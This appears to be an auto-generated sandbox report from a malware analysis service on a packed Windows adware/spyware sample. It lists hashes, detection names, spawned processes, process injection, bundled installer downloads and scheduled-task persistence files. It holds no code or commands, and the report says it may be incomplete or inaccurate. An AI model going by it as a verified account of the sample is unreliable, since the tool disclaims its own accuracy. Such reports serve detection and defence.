Skip to main content

SpyTool.Win32.Ardamax_6014e42e22


not-a-virus:HEUR:AdWare.Win32.ConvertAd.heur (Kaspersky), SpyTool.Win32.Ardamax.FD, Trojan.NSIS.StartPage.FD, Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, SpyTool, Adware

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 6014e42e22c25611cc80146e840cbe2b

SHA1: 824bdff141a0f1ef1e88e90e2231edf7d5582de9

SHA256: d3427777a18e716497d0695e25f13b2aae15f5e6736f8b9843dec4b327fbaded

SSDeep: 6144:Ke34QYfvbUeqJPShu jeF9sMkL75 ZPPfnE2Qyn2FEtt2NB6 sf:ZYfyUh/a vLF ZPPfnEUnsEWfXsf

Size: 307583 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2009-12-06 00:50:52

Analyzed on: WindowsXP SP3 32-bit

Summary: SpyTool. A program used to apply passive protection methods to spyware, such as obfuscation, encryption or polymorphism. The original malicious program is usually encrypted/compressed and stored inside the wrapper.

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The SpyTool creates the following process(es):

upgmsd_re_005010096.exe:1276
nsf2B.tmp:1664
nsf2B.tmp:668
nswA.tmp:1336
gmsd_re_005010096.exe:592
nsr19.tmp:204
nsdF.tmp:1060
fsd34.exe:1692
nsw42.tmp:660
setup.exe:1356
taskkill.exe:1804
taskkill.exe:1796
taskkill.exe:660
nsj32.tmp:1912
amisid.exe:1952
amisid.exe:1844
tasklist.exe:1852
tasklist.exe:324
nss12.tmp:1616
9823.exe:320
nsx36.tmp:1468
encrypt.exe:1060
encrypt.exe:1476
encrypt.exe:1100
encrypt.exe:1584
nsx1C.tmp:1896
nsx1C.tmp:1088
nst25.tmp:1804
nsk6.tmp:204
%original file name%.exe:1736

The SpyTool injects its code into the following process(es):

nsx46.tmp:2724
nso3D.tmp:3724

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process upgmsd_re_005010096.exe:1276 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@prof.youandmeandmeandyouhihi[1].txt (227 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@youandmeandmeandyouhihi[1].txt (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.cyl (428 bytes)

The process nsf2B.tmp:1664 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\All Users\Start Menu\Programs\GAMESDESKTOP\GamesDesktop.lnk (812 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp (4 bytes)
%Program Files%\gmsd_re_005010096\predm.exe (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.7z (7433 bytes)
%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe (29430 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-UGOR9.tmp (7433 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\CheckProc.cmd (288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.7z (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-9SIQI.tmp (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup\_shfoldr.dll (23 bytes)
%Program Files%\gmsd_re_005010096\unins000.msg (375 bytes)
%Program Files%\gmsd_re_005010096\gamesdesktop_widget.exe (77005 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-LKR89.tmp (15278 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe (23062 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\encrypt.exe (4185 bytes)
%Program Files%\gmsd_re_005010096\is-FEB6H.tmp (22284 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-L9FO9.tmp (8657 bytes)
%Program Files%\gmsd_re_005010096\unins000.dat (29605 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\itdownload.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.7z (8657 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\ex.bat (1564 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\is-P9554.tmp (4185 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.7z (15278 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup\_shfoldr.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\av.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\CheckProc.cmd (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\predm.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gmsd_re_005010096.7z (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\ex.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\upgmsd_re_005010096.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\itdownload.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\encrypt.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\_isetup (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-GNIR2.tmp\gamesdesktop_widget.7z (0 bytes)

The process nsf2B.tmp:668 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp\nsf2B.tmp (3781 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp\nsf2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\is-KUMK3.tmp (0 bytes)

The process nswA.tmp:1336 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsnD.tmp (7695 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsnC.tmp (0 bytes)

The process gmsd_re_005010096.exe:592 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\gmsd_re_005010096\1.20\cnf.cyl (269 bytes)

The process nsr19.tmp:204 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_OperaRUnew[1].exe (7288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1C.tmp (7288 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp\inetc.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx1D.tmp (0 bytes)

The process nsdF.tmp:1060 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\9823.exe (14988 bytes)

The process fsd34.exe:1692 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\f9626892-7a78-3199-abd2-97bbce96297b\OfferInstaller.exe (1617 bytes)

The process nsw42.tmp:660 makes changes in the file system.


The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc44.tmp (0 bytes)

The process nsx46.tmp:2724 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst49.tmp (19514 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\WmiInspector.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\flush-inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\UserInfo.dll (4 bytes)
%Program Files%\AnyProtectEx\product.guid (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp\System.dll (11 bytes)

The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\AnyProtectEx\installer\tempfile.t (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst4A.tmp (0 bytes)

The process setup.exe:1356 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\smalllogo.png (9 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sv.pak (207 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\chrome.7z (1161171 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\MyBrowser\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sl.pak (211 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\pdf.dll (67091 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\VisualElementsManifest.xml (392 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-PT.pak (222 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hr.pak (214 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\metro_driver.dll (1765 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\manifest.json (2 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es.pak (230 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome.dll (237340 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fi.pak (213 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pl.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\vi.pak (247 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hi.pak (1712 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\he.pak (253 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\delegate_execute.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe (5873 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ko.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\id.pak (202 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fa.pak (308 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sr.pak (1610 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nl.pak (216 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin (4 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Extensions\external_extensions.json (103 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\mybrowser.exe (3869 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_100_percent.pak (7386 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\logo.png (5 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\ffmpegsumo.dll (6337 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\da.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-US.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lt.pak (221 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\icudtl.dat (76792 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\lv.pak (225 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\de.pak (224 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\master_preferences (814 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sw.pak (208 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libglesv2.dll (5442 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_200_percent.pak (7972 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\resources.pak (121304 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-CN.pak (187 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\am.pak (302 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\d3dcompiler_46.dll (22433 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl64.exe (12288 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\mr.pak (1708 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libegl.dll (204 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\en-GB.pak (189 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\sk.pak (229 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_child.dll (261193 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ml.pak (1826 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\es-419.pak (226 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\kn.pak (1768 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fil.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\fr.pak (239 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\el.pak (1667 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ta.pak (1784 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\pt-BR.pak (217 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bg.pak (1640 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\nb.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\PepperFlash\pepflashplayer.dll (122658 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\bn.pak (1731 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ja.pak (266 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\VisualElements\splash-620x300.png (11 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ca.pak (227 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\cs.pak (223 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\wow_helper.exe (67 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe (6841 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\secondarytile.png (3 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ro.pak (228 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\zh-TW.pak (190 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ru.pak (1612 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\te.pak (1761 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\chrome_elf.dll (125 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\uk.pak (1621 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_64.nexe (20507 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\it.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\nacl_irt_x86_32.nexe (15801 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\th.pak (1702 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\et.pak (201 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ar.pak (293 bytes)
%Documents and Settings%\All Users\Desktop\MyBrowser.lnk (1 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\hu.pak (235 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\gu.pak (1705 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\libexif.dll (303 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\ms.pak (206 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\Locales\tr.pak (220 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\39.5.2171.95\39.5.2171.95.manifest (222 bytes)

The SpyTool deletes the following file(s):

%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\wow_helper.exe (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574\Chrome-bin\mybrowser.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\prefs (0 bytes)
%Program Files%\MyBrowser\MyBrowser (0 bytes)
%Program Files%\MyBrowser\MyBrowser\Temp\source1356_19574 (0 bytes)

The process nsj32.tmp:1912 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\FinalInstaller_dotnet4[1].exe (1479345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fsd34.exe (388270 bytes)

The process nss12.tmp:1616 makes changes in the file system.


The SpyTool deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsu14.tmp (0 bytes)

The process 9823.exe:320 makes changes in the file system.


The SpyTool creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\weather_channel.ico (5593 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ebay.ico (55 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\msn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\espn.ico (36 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\pinterest.ico (39 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bestbuy.ico (3913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\tumblr.ico (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\imdb.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\utility.exe (14988 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\tripadvisor.ico (1917 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\linkedin.ico (37 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\groupom.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\bbc.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\groupom.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\booking.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gizmodo.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\hotels.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\cnn.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\gmail.ico (47 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bing.ico (42 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\espn.ico (1588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\ikea.ico (2993 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bbc.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\etsy.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\youtube.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_mail.ico (1913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\nfl.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\ted.ico (57 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].004 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].005 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].001 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].002 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\ie.zip[1].003 (3985887 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\netflix.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_plus.ico (64 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\search.ico (57 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\booking.com.ico (45 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\netflix.ico (51 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\priceline.ico (53 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\bestbuy.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\twitter.ico (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\pinterest.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\huffingtonpost.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\walmart.ico (48 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\amazon.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_news.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\agoda.ico (61 bytes)
%WinDir%\Tasks\27A66B06-9E26-42DD-B887-47E55490B3.job (1644 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\target.ico (50 bytes)
%WinDir%\Tasks\MyBrowser.job (1966 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\9gag.ico (56 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_finance.ico (601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yandex.ico (35 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\nytimes.ico (61 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\skype.ico (44 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\huffingtonpost.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\forbes.ico (1592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\etsy.ico (3913 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\walmart.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\prefs (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\gmail.ico (1601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\kayak.com.ico (1601 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yelp.ico (42 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\yahoo_search.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\mail.ru.ico (1909 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\weather_channel.ico (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\yahoo_finance.ico (2993 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\setup.exe (37305 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\google_translate.ico (38 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\reddit.ico (60 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\mail.ru.ico (49 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\3554\Icons\wikipedia.ico (1913 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\forbes.ico (40 bytes)
%Program Files%\MyBrowser\MyBrowser\Application\Icons\imdb.ico (601 bytes)
